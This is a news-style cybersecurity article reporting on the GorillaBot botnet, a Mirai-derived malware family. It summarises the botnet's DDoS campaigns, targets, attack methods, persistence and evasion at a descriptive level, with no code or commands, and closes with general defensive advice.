Cybersecurity experts have uncovered a new botnet malware family called Gorilla, also known as GorillaBot, which draws inspiration from the leaked source code of the infamous Mirai botnet.
A recent report reveals that this powerful botnet executed over 300,000 distributed denial-of-service (DDoS) attacks between September 4 and September 27, 2024, issuing an average of 20,000 attack commands daily.
This botnet has spread its reach across more than 100 countries, with key targets including universities, government websites, telecommunications, banks, as well as gaming and gambling platforms. Among the most heavily affected countries are China, the United States, Canada, and Germany.
The malware uses several types of DDoS methods, such as UDP flood, SYN flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, and ACK flood attacks. The use of the UDP protocol, which is connectionless, allows the botnet to spoof source IP addresses, generating massive amounts of traffic. Additionally, GorillaBot supports multiple CPU architectures, including ARM, MIPS, and x86 variants, allowing it to infect a wide range of devices.
One particularly concerning feature of GorillaBot is its ability to exploit a vulnerability in Apache Hadoop YARN RPC, enabling remote code execution on affected systems. Although this vulnerability has been known and abused in the wild since 2021, the botnet continues to leverage it in its attacks.
Persistence is achieved by creating a service file on the infected host that ensures the malware runs each time the system starts. The botnet also downloads and executes shell scripts from a remote server, embedding commands in critical system files to maintain long-term control over the compromised devices.
Researchers note that Gorilla employs advanced encryption techniques, often used by the Keksec group, to obscure key information and avoid detection. Its sophisticated mechanisms to hide its presence and retain control demonstrate the growing complexity of emerging botnet families.
To defend against botnet attacks like Gorilla, organizations should prioritize keeping systems and software up to date, especially addressing known vulnerabilities like Apache Hadoop YARN RPC. Network monitoring and DDoS mitigation strategies, such as deploying firewalls and rate limiting, are essential.
